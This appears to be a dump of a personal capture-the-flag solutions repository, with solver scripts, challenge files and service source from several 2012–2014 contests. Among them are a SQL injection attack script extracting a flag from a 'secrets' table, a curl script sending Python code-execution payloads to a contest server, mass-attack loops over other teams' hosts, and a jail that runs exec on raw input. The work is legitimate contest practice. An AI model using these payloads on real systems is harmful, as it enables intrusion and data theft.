https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.phdays-quals/f100/4_all.1.dat


--------------------------------------------------------------------------------
/2012.phdays-quals/f100/5_hex2rar.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | #coding: binary
 3 | data = File.binread("4_all.1.dat")
 4 | data = data[/[a-z0-9:]+/i]
 5 | data = data.split(":")
 6 | raise "invalid size: want #{data[0]}, got #{data[1].size}" if data[0].to_i != data[1].size
 7 | File.open( "6.rar", "wb" ) do |f|
 8 |   f << [data[1]].pack("H*")
 9 | end
10 | 


--------------------------------------------------------------------------------
/2012.phdays-quals/f100/6.rar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.phdays-quals/f100/6.rar


--------------------------------------------------------------------------------
/2012.phdays-quals/f100/secret.txt:
--------------------------------------------------------------------------------
1 | 90f3910ff22f4be0dfa95a2fd6cb8a25


--------------------------------------------------------------------------------
/2012.phdays-quals/f300/1.first_hint:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.phdays-quals/f300/1.first_hint


--------------------------------------------------------------------------------
/2012.phdays-quals/f300/2.gen_data_using_faker:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | 
 3 | # hilbert binary uses following url for its data:
 4 | # http://api.qrserver.com/v1/create-qr-code/?size=25x25&margin=0&data=00000000000000000000000000000000
 5 | # where "00000000000000000000000000000000" is an argument given to binary
 6 | 
 7 | # put into /etc/hosts:
 8 | # 127.0.0.1   api.qrserver.com
 9 | 
10 | # and start faker!
11 | 
12 | def gen_for_coord x,y
13 |   fname = ("%05dx%05d" % [x,y]).rjust(32,"0")
14 |   puts fname
15 |   Dir.mkdir "data" unless Dir.exist?("data")
16 |   cmd = "./1.first_hint #{fname} > data/#{fname}"
17 |   system cmd
18 |   raise "error executing #{cmd.inspect}" unless $?.success?
19 | end
20 | 
21 | if ARGV.size == 2
22 |   gen_for_coord *ARGV.map(&:to_i)
23 |   exit
24 | end
25 | 
26 | ARGV[0].to_i.upto(24) do |x|
27 |   25.times do |y|
28 |     gen_for_coord x,y
29 |   end
30 | end
31 | 


--------------------------------------------------------------------------------
/2012.phdays-quals/f300/2.sinatra-qr-faker.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | require 'sinatra'
 3 | require 'zpng'
 4 | include ZPNG
 5 | 
 6 | # generates PNG image, 25x25, white background and ONE pixel set,
 7 | # coord of pixel given by 'data' param: "?data=4x5": x=4, y=5
 8 | 
 9 | # 1. put into /etc/hosts:
10 | # 127.0.0.1   api.qrserver.com
11 | 
12 | # 2. run this file AS ROOT b/c it should listen on port 80
13 | # ./2.sinatra-qr-faker.rb -p 80
14 | 
15 | get '/v1/create-qr-code/' do
16 |   content_type 'image/png'
17 |   img = Image.new :width => 25, :height => 25, :color => 3, :depth => 1, :bg => Color::WHITE
18 |   x,y = params[:data].split(/x/i).map(&:to_i)
19 |   img[x,y] = Color::BLACK
20 |   img.export
21 | end
22 | 


--------------------------------------------------------------------------------
/2012.phdays-quals/f300/3_idx2xy.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | require 'yaml'
 3 | 
 4 | h = {}
 5 | 
 6 | Dir["data/0000*x*"].each do |fname|
 7 |   x,y = File.basename(fname).split('x').map(&:to_i)
 8 |   data = File.read(fname)
 9 |   idx = nil
10 |   data.strip.each_line do |line|
11 |     a = line.split
12 |     if a.size == 2
13 |       raise if idx
14 |       idx = a.last
15 |     end
16 |   end
17 |   if idx
18 |     raise if h[idx]
19 |     h[idx] = [x,y]
20 |   else
21 |     puts "[?] no idx in #{fname}"
22 |   end
23 | end
24 | 
25 | File.open("4_idx2xy.yml","w") do |f|
26 |   f << h.to_yaml
27 | end
28 | 


--------------------------------------------------------------------------------
/2012.phdays-quals/f300/5_restore_original.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | require 'zpng'
 3 | require 'yaml'
 4 | include ZPNG
 5 | 
 6 | img = Image.new :width => 25, :height => 25, :color => 3, :depth => 1, :bg => Color::WHITE
 7 | 
 8 | idx2xy = YAML::load_file "4_idx2xy.yml"
 9 | data = File.read("0.hilbert").strip
10 | 
11 | indexes = []
12 | data.split("\n").each_with_index do |line|
13 |   line.split[1..-1].each do |idx|
14 |     indexes << idx
15 |   end
16 | end
17 | 
18 | indexes.each do |idx|
19 |   x,y = idx2xy[idx]
20 |   img[x,y] = Color::BLACK
21 | end
22 | 
23 | img.save "5.png"
24 | 


--------------------------------------------------------------------------------
/2012.phdays-quals/f300/answer.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.phdays-quals/f300/answer.png


--------------------------------------------------------------------------------
/2012.phdays-quals/pwn100/attack.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | 
 3 | def upload
 4 |   # XXX: get session id from your browser cookies!
 5 |   # (or tcpdump :)
 6 |   session="dZnITNS/joMp0wM77YcdgGkTNLc=?user_id=TDcxOUwKLg=="
 7 |   `curl -s -F "key=@ca.tmp;type=application/x-x509-ca-cert" http://ctf.phdays.com:3185/ -b "session=#{session}"`.strip
 8 | end
 9 | 
10 | # self generated certificate, required for task
11 | PEM = File.read("ca.crt")
12 | 
13 | def attack payload
14 |   File.open("ca.tmp","wb") do |f|
15 |     f << PEM
16 |     f << payload
17 |   end
18 |   r = upload
19 |   puts r
20 | end
21 | 
22 | ## to insert my own certificate into admin's:
23 | #pem = PEM.gsub("\n","\\n")
24 | #attack "'),(1,'#{pem}'); /* '"
25 | 
26 | #attack "'),(719,(SELECT group_concat(column_name) FROM INFORMATION_SCHEMA.columns where table_name='secrets')); /* '"
27 | 
28 | attack "'),(719,(SELECT flag from secrets)); /* '"
29 | 


--------------------------------------------------------------------------------
/2012.phdays-quals/pwn300/0.process.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.phdays-quals/pwn300/0.process.pyc


--------------------------------------------------------------------------------
/2012.phdays-quals/pwn300/1.remote_shell_exploit.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/sh
 2 | if [ $# -eq 1 ]; then
 3 |     curl http://ctf.phdays.com:2137 -d "actions=eval&human=__import__('subprocess').Popen(['$1'], stdout=__import__('subprocess').PIPE).communicate()[0]&choice=%00"
 4 | elif [ $# -eq 2 ]; then
 5 |     curl http://ctf.phdays.com:2137 -d "actions=eval&human=__import__('subprocess').Popen(['$1','$2'], stdout=__import__('subprocess').PIPE).communicate()[0]&choice=%00"
 6 | elif [ $# -eq 3 ]; then
 7 |     curl http://ctf.phdays.com:2137 -d "actions=eval&human=__import__('subprocess').Popen(['$1','$2','$3'], stdout=__import__('subprocess').PIPE).communicate()[0]&choice=%00"
 8 | elif [ $# -eq 4 ]; then
 9 |     curl http://ctf.phdays.com:2137 -d "actions=eval&human=__import__('subprocess').Popen(['$1','$2','$3','$4'], stdout=__import__('subprocess').PIPE).communicate()[0]&choice=%00"
10 | else
11 |     echo "not implemented"
12 | fi
13 | 


--------------------------------------------------------------------------------
/2012.phdays-quals/pwn400/0.pyjail.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | from secure_reader import Reader
 3 | 
 4 | while True:
 5 |     try:
 6 | 	inp = raw_input('>>> ')
 7 | 	a = None
 8 | 	exec 'a=' + inp
 9 | 	print a
10 |     except Exception, e:
11 | 	print  e.__class__.__name__, ':', e 
12 | 
13 | 


--------------------------------------------------------------------------------
/2012.polictf/gb200/0_challenge_1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.polictf/gb200/0_challenge_1.jpg


--------------------------------------------------------------------------------
/2012.polictf/gb200/0_challenge_2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.polictf/gb200/0_challenge_2.jpg


--------------------------------------------------------------------------------
/2012.polictf/gb200/1_hint1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.polictf/gb200/1_hint1.pdf


--------------------------------------------------------------------------------
/2012.polictf/gb200/2_hint2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.polictf/gb200/2_hint2.jpg


--------------------------------------------------------------------------------
/2012.polictf/gb200/3_answer.rb:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env ruby
2 | s = "10000000 00000111 00110111"
3 | puts s.reverse.split.map{ |x| "%02X" % x.to_i(2) }.join
4 | #puts s.split.map{ |x| "%02X" % x.to_i(2) }.join
5 | #puts s.split.reverse.map{ |x| "%02X" % x.to_i(2) }.join
6 | #puts s.reverse.split.reverse.map{ |x| "%02X" % x.to_i(2) }.join
7 | 


--------------------------------------------------------------------------------
/2012.polictf/gb200/3_solving_process_scan.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.polictf/gb200/3_solving_process_scan.jpg


--------------------------------------------------------------------------------
/2012.polictf/gb200/README.txt:
--------------------------------------------------------------------------------
 1 | Mmhhh that's a strange way to display a number using a binary
 2 | representation...
 3 | 
 4 | (Submit as upper case hex encoded numbers, with rightmost green led being the
 5 | MSB. Without leading 0x)
 6 | 
 7 | ---
 8 | 
 9 | Изначально были даны только первые две картинки.
10 | Без обозначения микросхем.
11 | Через несколько часов - хинт №1 - PDFка с названием микросхемы - КМ155ИД1.
12 | Еще через пару часов  - хинт №2 - фотка схемы с другого ракурса.
13 | 
14 | На картинке 3_solving_process_scan.jpg изображен процесс решения с помощью
15 | бумажки(tm) и ручки(tm).
16 | 
17 | http://www.diagram.com.ua/info/rad_nach/6.shtml
18 | 


--------------------------------------------------------------------------------
/2012.ructfe/geo1.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.ructfe/geo1.pcap


--------------------------------------------------------------------------------
/2012.ructfe/geo2.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.ructfe/geo2.pcap


--------------------------------------------------------------------------------
/2012.ructfe/geo3.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.ructfe/geo3.pcap


--------------------------------------------------------------------------------
/2012.ructfe/geo4.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.ructfe/geo4.pcap


--------------------------------------------------------------------------------
/2012.ructfe/geotracker/geotracker.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.ructfe/geotracker/geotracker.jar


--------------------------------------------------------------------------------
/2012.ructfe/geotracker/geotracker.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | exec java -jar geotracker.jar push-server


--------------------------------------------------------------------------------
/2012.ructfe/geotracker/localDB.properties:
--------------------------------------------------------------------------------
 1 | #HSQL Database Engine 1.8.0.10
 2 | #Sun Nov 25 09:05:23 GMT 2012
 3 | hsqldb.script_format=0
 4 | runtime.gc_interval=0
 5 | sql.enforce_strict_size=false
 6 | hsqldb.cache_size_scale=8
 7 | readonly=false
 8 | hsqldb.nio_data_file=true
 9 | hsqldb.cache_scale=14
10 | version=1.8.0
11 | hsqldb.default_table_type=memory
12 | hsqldb.cache_file_scale=1
13 | hsqldb.log_size=200
14 | modified=no
15 | hsqldb.cache_version=1.7.0
16 | hsqldb.original_version=1.8.0
17 | hsqldb.compatible_version=1.8.0
18 | 


--------------------------------------------------------------------------------
/2012.ructfe/geotracker/localDB.script:
--------------------------------------------------------------------------------
 1 | CREATE SCHEMA PUBLIC AUTHORIZATION DBA
 2 | CREATE MEMORY TABLE NOTIFICATION(ID BIGINT GENERATED BY DEFAULT AS IDENTITY(START WITH 1) NOT NULL PRIMARY KEY,CLIENT_ID VARCHAR(255),DATE_ADDED TIMESTAMP,PAYLOAD VARCHAR(255),SERVICE_ID VARCHAR(255))
 3 | ALTER TABLE NOTIFICATION ALTER COLUMN ID RESTART WITH 4
 4 | CREATE USER SA PASSWORD ""
 5 | GRANT DBA TO SA
 6 | SET WRITE_DELAY 10
 7 | SET SCHEMA PUBLIC
 8 | INSERT INTO NOTIFICATION VALUES(1,'SUZBNTQuBt','2012-11-24 22:14:25.109000000','HJNBTFEV50E45UR4UCM1JWNTX9PV8DZ=','j3oSP99Ado')
 9 | INSERT INTO NOTIFICATION VALUES(2,'SUZBNTQuBt','2012-11-24 22:15:53.281000000','HJNBTFEV50E45UR4UCM1JWNTX9PV8DZ=','j3oSP99Ado')
10 | INSERT INTO NOTIFICATION VALUES(3,'SUZBNTQuBt','2012-11-24 22:16:02.471000000','HJNBTFEV50E45UR4UCM1JWNTX9PV8DZ=','j3oSP99Ado')
11 | 


--------------------------------------------------------------------------------
/2012.ructfe/geotracker/source/makefile:
--------------------------------------------------------------------------------
 1 | geotracker:
 2 | 	mvn install
 3 | 
 4 | install: geotracker
 5 | 	cp target/server-1.0.jar /home/geotracker/geotracker.jar
 6 | 	cp src/push-server.xml /home/geotracker/push-server.xml
 7 | 	cp src/geotracker.sh /home/geotracker/geotracker.sh
 8 | 	chmod 0775 /home/geotracker/geotracker.sh
 9 | 
10 | uninstall:
11 | 	rm -rf /home/geotracker/*
12 | 
13 | clean:
14 | 	rm -rf target
15 | 
16 | all:
17 | 	geotracker
18 | 


--------------------------------------------------------------------------------
/2012.ructfe/geotracker/source/src/geotracker.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | exec java -jar geotracker.jar push-server


--------------------------------------------------------------------------------
/2012.ructfe/geotracker/source/src/main/java/org/ructf/ructfe2012/geotracker/push/server/Constants.java:
--------------------------------------------------------------------------------
 1 | package org.ructf.ructfe2012.geotracker.push.server;
 2 | 
 3 | public class Constants {
 4 | 	
 5 | 	public static final String PUSH_STRING = "|900DC0FF33";
 6 | 	public static final String PUSH_STRING_PAYLOAD = "|B4DC0FF33:";
 7 | 	public static final String REQUEST_PUSH = "PUSH";
 8 | 
 9 | }
10 | 


--------------------------------------------------------------------------------
/2012.ructfe/geotracker/source/src/main/java/org/ructf/ructfe2012/geotracker/push/server/IClient.java:
--------------------------------------------------------------------------------
 1 | package org.ructf.ructfe2012.geotracker.push.server;
 2 | 
 3 | import java.net.Socket;
 4 | 
 5 | import org.springframework.scheduling.annotation.Async;
 6 | 
 7 | public interface IClient {
 8 | 	
 9 | 	String identifyClient();
10 | 	
11 | 	void setListener(IListener listener);
12 | 
13 | 	@Async
14 | 	void serve(Socket socket);
15 | 	
16 | 	void send(String message);
17 | 	
18 | 	void close();
19 | 	
20 | }
21 | 


--------------------------------------------------------------------------------
/2012.ructfe/geotracker/source/src/main/java/org/ructf/ructfe2012/geotracker/push/server/IClientList.java:
--------------------------------------------------------------------------------
 1 | package org.ructf.ructfe2012.geotracker.push.server;
 2 | 
 3 | public interface IClientList {
 4 | 
 5 | 	void checkClients();
 6 | 
 7 | 	String getClients(String serviceId);
 8 | 	
 9 | }
10 | 


--------------------------------------------------------------------------------
/2012.ructfe/geotracker/source/src/main/java/org/ructf/ructfe2012/geotracker/push/server/IKeepAliveReader.java:
--------------------------------------------------------------------------------
 1 | package org.ructf.ructfe2012.geotracker.push.server;
 2 | 
 3 | import org.ructf.ructfe2012.geotracker.push.server.notify.INotificationClient;
 4 | 
 5 | public interface IKeepAliveReader {
 6 | 
 7 | 	void readClient(INotificationClient client, String message);
 8 | 	
 9 | }
10 | 


--------------------------------------------------------------------------------
/2012.ructfe/geotracker/source/src/main/java/org/ructf/ructfe2012/geotracker/push/server/IListener.java:
--------------------------------------------------------------------------------
1 | package org.ructf.ructfe2012.geotracker.push.server;
2 | 
3 | 
4 | public interface IListener extends IStartable {
5 | 	
6 | 	void remove(IClient client);
7 | 
8 | }
9 | 


--------------------------------------------------------------------------------
/2012.ructfe/geotracker/source/src/main/java/org/ructf/ructfe2012/geotracker/push/server/INotifiable.java:
--------------------------------------------------------------------------------
1 | package org.ructf.ructfe2012.geotracker.push.server;
2 | 
3 | public interface INotifiable {
4 | 
5 | 	void notification(String serviceId, String clientId, String payload);
6 | 
7 | }
8 | 


--------------------------------------------------------------------------------
/2012.ructfe/geotracker/source/src/main/java/org/ructf/ructfe2012/geotracker/push/server/IPushable.java:
--------------------------------------------------------------------------------
1 | package org.ructf.ructfe2012.geotracker.push.server;
2 | 
3 | public interface IPushable {
4 | 
5 | 	void push(String message, String payload);
6 | 
7 | }
8 | 


--------------------------------------------------------------------------------
/2012.ructfe/geotracker/source/src/main/java/org/ructf/ructfe2012/geotracker/push/server/IServiceRequest.java:
--------------------------------------------------------------------------------
1 | package org.ructf.ructfe2012.geotracker.push.server;
2 | 
3 | public interface IServiceRequest {
4 | 
5 | 	boolean performRequest(IClient client, String data);
6 | 	
7 | }
8 | 


--------------------------------------------------------------------------------
/2012.ructfe/geotracker/source/src/main/java/org/ructf/ructfe2012/geotracker/push/server/IStartable.java:
--------------------------------------------------------------------------------
 1 | package org.ructf.ructfe2012.geotracker.push.server;
 2 | 
 3 | import org.springframework.scheduling.annotation.Async;
 4 | 
 5 | public interface IStartable {
 6 | 
 7 | 	@Async
 8 | 	void start();
 9 | 
10 | }
11 | 


--------------------------------------------------------------------------------
/2012.ructfe/geotracker/source/src/main/java/org/ructf/ructfe2012/geotracker/push/server/notify/INotificationClient.java:
--------------------------------------------------------------------------------
 1 | package org.ructf.ructfe2012.geotracker.push.server.notify;
 2 | 
 3 | import org.ructf.ructfe2012.geotracker.push.server.IClient;
 4 | import org.ructf.ructfe2012.geotracker.push.server.IKeepAliveReader;
 5 | 
 6 | public interface INotificationClient extends IClient {
 7 | 
 8 | 	void setKeepAliveReader(IKeepAliveReader keepAliveReader);
 9 | 	void setClientId(String clientId);
10 | 
11 | }
12 | 


--------------------------------------------------------------------------------
/2012.ructfe/geotracker/source/src/main/java/org/ructf/ructfe2012/geotracker/push/server/notify/INotificationRepository.java:
--------------------------------------------------------------------------------
 1 | package org.ructf.ructfe2012.geotracker.push.server.notify;
 2 | 
 3 | import java.util.List;
 4 | 
 5 | public interface INotificationRepository {
 6 | 
 7 | 	Notification saveNotification(String serviceId, String clientId, String payload);
 8 | 	List getMissedNotifications(String serviceId, String clientId, Long lastId);
 9 | 	List getClients(String serviceId);
10 | 	
11 | }
12 | 


--------------------------------------------------------------------------------
/2012.ructfe/geotracker/source/src/main/java/org/ructf/ructfe2012/geotracker/push/server/notify/Notification.java:
--------------------------------------------------------------------------------
 1 | package org.ructf.ructfe2012.geotracker.push.server.notify;
 2 | 
 3 | import java.util.Date;
 4 | 
 5 | import javax.persistence.Entity;
 6 | import javax.persistence.GeneratedValue;
 7 | import javax.persistence.Id;
 8 | import javax.persistence.PrePersist;
 9 | 
10 | @Entity
11 | public class Notification {
12 | 
13 | 	@Id
14 | 	@GeneratedValue
15 | 	public Long id;
16 | 	public String clientId;
17 | 	public String serviceId;
18 | 	public String payload;
19 | 	public Date dateAdded;
20 | 	
21 | 	@PrePersist
22 | 	void setDateAdded() {
23 | 		dateAdded = new Date();
24 | 	}
25 | 	
26 | }
27 | 


--------------------------------------------------------------------------------
/2012.ructfe/geotracker/source/src/main/java/org/ructf/ructfe2012/geotracker/push/server/push/IPushClient.java:
--------------------------------------------------------------------------------
 1 | package org.ructf.ructfe2012.geotracker.push.server.push;
 2 | 
 3 | import org.ructf.ructfe2012.geotracker.push.server.IClient;
 4 | import org.ructf.ructfe2012.geotracker.push.server.IServiceRequest;
 5 | 
 6 | public interface IPushClient extends IClient {
 7 | 
 8 | 	void setServiceRequest(IServiceRequest serviceRequest);
 9 | 
10 | }
11 | 


--------------------------------------------------------------------------------
/2012.ructfe/geotracker/source/src/main/java/org/ructf/ructfe2012/geotracker/push/server/push/PushClient.java:
--------------------------------------------------------------------------------
 1 | package org.ructf.ructfe2012.geotracker.push.server.push;
 2 | 
 3 | import org.ructf.ructfe2012.geotracker.push.server.Client;
 4 | import org.ructf.ructfe2012.geotracker.push.server.IServiceRequest;
 5 | 
 6 | public class PushClient extends Client implements IPushClient {
 7 | 	
 8 | 	private IServiceRequest serviceRequest;
 9 | 	
10 | 	public void setServiceRequest(IServiceRequest serviceRequest) {
11 | 		this.serviceRequest = serviceRequest;
12 | 	}
13 | 	
14 | 	@Override
15 | 	protected boolean readData(String data) {
16 | 		return serviceRequest.performRequest(this, data);
17 | 	}
18 | 
19 | 	@Override
20 | 	public String identifyClient() {
21 | 		return null;
22 | 	}
23 | 
24 | }
25 | 


--------------------------------------------------------------------------------
/2012.ructfe/geotracker/source/src/main/resources/system.properties:
--------------------------------------------------------------------------------
 1 | listener.port=10900
 2 | 
 3 | push.port=10901
 4 | 
 5 | client.timeout=10000
 6 | 
 7 | cron.timeout=0/90 * * * * ?
 8 | 
 9 | online.timeout=30000
10 | 


--------------------------------------------------------------------------------
/2012.ructfe/geotracker/source/src/makefile:
--------------------------------------------------------------------------------
 1 | geotracker:
 2 | 	mvn install
 3 | 
 4 | install: geotracker
 5 | 	cp target/server-1.0.jar /home/geotracker/geotracker.jar
 6 | 	cp src/push-server.xml /home/geotracker/push-server.xml
 7 | 	cp src/geotracker.sh /home/geotracker/geotracker.sh
 8 | 	chmod 0775 /home/geotracker/geotracker.sh
 9 | 
10 | uninstall:
11 | 	rm -rf /home/geotracker/*
12 | 
13 | clean:
14 | 	rm -rf target
15 | 
16 | all:
17 | 	geotracker
18 | 


--------------------------------------------------------------------------------
/2012.ructfe/geotracker_attack_all_hosts.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | for i in {1..49}; do
3 |     # our host is #12, don't attack it
4 |     if [ $i != 12 ]; then
5 |        ./geotracker_attack.rb 10.23.$i.3 &
6 |     fi
7 | done
8 | 


--------------------------------------------------------------------------------
/2012.rwth/_pcaps.7z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.rwth/_pcaps.7z


--------------------------------------------------------------------------------
/2012.rwth/azurecoast/azure_attack_all_hosts.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | for i in {1..75}; do
3 |     # our host is #21, don't attack it
4 |     if [ $i != 21 ]; then
5 |        ./attack.rb 10.12.$i.8 &
6 |        sleep 1
7 |     fi
8 | done
9 | 


--------------------------------------------------------------------------------
/2012.rwth/azurecoast/rwthctfvm/data/1.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | data = File.read "img.go"
 3 | out = ''
 4 | data.scan(/0x[a-f0-9]+/i).each do |num|
 5 |   out << [num.to_i(16)].pack('L')
 6 | end
 7 | 
 8 | File.open("out.bin","wb") do |f|
 9 |   f << out
10 | end
11 | 


--------------------------------------------------------------------------------
/2012.rwth/azurecoast/rwthctfvm/data/out.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.rwth/azurecoast/rwthctfvm/data/out.bin


--------------------------------------------------------------------------------
/2012.rwth/azurecoast/rwthctfvm/make.sh:
--------------------------------------------------------------------------------
1 | GOPATH=/home/zed/ctf.rwth2012/azurecost/service_source/service/go go build rwthctfvm
2 | #cp /home/service_source/service/go/src/rwthctfvm/rwthctfvm /home/service_source/binary
3 | 


--------------------------------------------------------------------------------
/2012.rwth/azurecoast/rwthctfvm/rwthctfvm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.rwth/azurecoast/rwthctfvm/rwthctfvm


--------------------------------------------------------------------------------
/2012.rwth/azurecoast/rwthctfvm/storage_gen.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | 
 3 | data = File.binread("storage/00000000000000000")
 4 | 0.upto(data.size) do |i|
 5 |   data2 = data.dup
 6 |   data2[i] = 0xff.chr
 7 |   fname = "storage/%017i" % i
 8 |   File.open(fname,"wb") do |f|
 9 |     f << data2
10 |   end
11 | end
12 | 


--------------------------------------------------------------------------------
/2012.rwth/azurecoast/rwthctfvm/storage_gen2.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | 
 3 | data = File.binread("storage/00000000000000000")
 4 | 32.upto(127) do |i|
 5 |   data2 = data.dup
 6 |   data2[4] = i.chr
 7 |   fname = "storage/Z%016x" % i
 8 |   File.open(fname,"wb") do |f|
 9 |     f << data2
10 |   end
11 | end
12 | 


--------------------------------------------------------------------------------
/2012.rwth/azurecoast/rwthctfvm/vm.txt:
--------------------------------------------------------------------------------
 1 | 4 byte instructions
 2 | (some instructions may need the next slot)
 3 | regs: acc, zer, ip, t1, t2
 4 | 
 5 | target/src can be reg, [reg] or 8bit immediate
 6 | opts
 7 | arg1 00 => reg, 01 => [reg], 10 => 8bit immediate
 8 | arg2 00 => reg, 01 => [reg], 10 => 8bit immediate
 9 | 
10 | [ldw, opts, target, nul] [value]
11 | 
12 | [add, opts, target, src]
13 | [sub, opts, target, src]
14 | [mul, opts, target, src]
15 | [div, opts, target, src]
16 | [mod, opts, target, src]
17 | 
18 | [and, opts, target, src]
19 | [or, opts, target, src]
20 | [not, opts, target, src] (target = !src)
21 | 
22 | [mov, opts, target, src]
23 | [jmp, opts, offset     ]
24 | [jz,  opts, offset     ]
25 | [int, opts, arg1, arg2 ]
26 | 
27 | syscalls
28 | read  fd, buffer
29 | write fd, buffer
30 | seek  fd, offset
31 | close fd
32 | open  path
33 | exec  cmdline, resbuffer
34 | 


--------------------------------------------------------------------------------
/2012.rwth/azurecoast/storage/f5aLthVhbEYHsmxn0:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.rwth/azurecoast/storage/f5aLthVhbEYHsmxn0


--------------------------------------------------------------------------------
/2012.rwth/azurecoast/stream1.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.rwth/azurecoast/stream1.pcap


--------------------------------------------------------------------------------
/2012.rwth/azurecoast/stream2.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.rwth/azurecoast/stream2.pcap


--------------------------------------------------------------------------------
/2012.rwth/azurecoast/stream5.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.rwth/azurecoast/stream5.pcap


--------------------------------------------------------------------------------
/2012.rwth/ezpz/ezpz.tgz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.rwth/ezpz/ezpz.tgz


--------------------------------------------------------------------------------
/2012.rwth/tattle/tattle:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.rwth/tattle/tattle


--------------------------------------------------------------------------------
/2012.rwth/tattle/tattle_attack_all_hosts.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | for i in {1..75}; do
3 |     # our host is #21, don't attack it
4 |     if [ $i != 21 ]; then
5 |        ./tattle_attack.rb 10.12.$i.6 &
6 |        sleep 1
7 |     fi
8 | done
9 | 


--------------------------------------------------------------------------------
/2012.rwth/zork/zork:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.rwth/zork/zork


--------------------------------------------------------------------------------
/2012.rwth/zork/zork_attack_all_hosts.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | for i in {1..75}; do
3 |     # our host is #21, don't attack it
4 |     if [ $i != 21 ]; then
5 |        ./zork_attack.rb 10.12.$i.5 &
6 |        sleep 1
7 |     fi
8 | done
9 | 


--------------------------------------------------------------------------------
/2012.rwth/zork/zork_patched:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.rwth/zork/zork_patched


--------------------------------------------------------------------------------
/2014.ructf-quals/100.steg.cats_eye/solve.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | #coding: binary
 3 | require 'zpng'
 4 | require 'sugar_png'
 5 | require 'pp'
 6 | 
 7 | # run "convert task.gif task.png"
 8 | # produces 8 PNG frames from animated task.gif
 9 | 
10 | images = Dir["task*.png"].sort.map{ |fname| ZPNG::Image.load(fname) }
11 | 
12 | w = images[0].width
13 | h = images[0].height
14 | 
15 | sugar = SugarPNG.new :width => w
16 | 
17 | w.times do |x|
